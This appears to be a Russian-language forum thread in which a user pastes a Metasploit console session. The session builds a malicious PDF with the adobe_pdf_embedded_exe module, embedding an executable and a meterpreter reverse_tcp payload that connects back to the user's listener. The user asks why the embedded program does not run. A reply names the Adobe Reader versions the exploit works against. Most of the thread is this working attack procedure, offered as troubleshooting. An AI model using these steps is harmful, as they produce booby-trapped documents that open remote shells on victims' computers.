![]() |
Pdf сплойт, работа с Metasploit Console
Прописываю следующее
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /home/1/1.pdf INFILENAME => /home/1/1.pdf msf exploit(adobe_pdf_embedded_exe) > set EXENAME /home/1/1.exe EXENAME => /home/1/1.exe msf exploit(adobe_pdf_embedded_exe) > set FILENAME 1_new.pdf FILENAME => 1_new.pdf msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /home/1 OUTPUTPATH => /home/1 msf exploit(adobe_pdf_embedded_exe) > exploit [*] Started reverse handler on port 4444[*] Reading in '/home/1/1.pdf'...[*] Parsing '/home/1/1.pdf'...[*] Parsing Successful.[*] Using '/home/1/1.exe' as payload...[*] Creating '1_new.pdf' file...[*] Generated output file /home/1/1_new.pdf[*] Exploit completed, but no session was created. Новый pdf файл создает успешно. При запуске выдает предупреждение. нажимаю Open file, но программу не запускает (попросту не видит). Я склоняюсь к тому что уязвимость не пашет под моей версией Adobe Reader'a. |
а какая у тебя версия Adobe Reader'a ?уязвимы 8.1.2>9.1.0
|
| Время: 09:46 |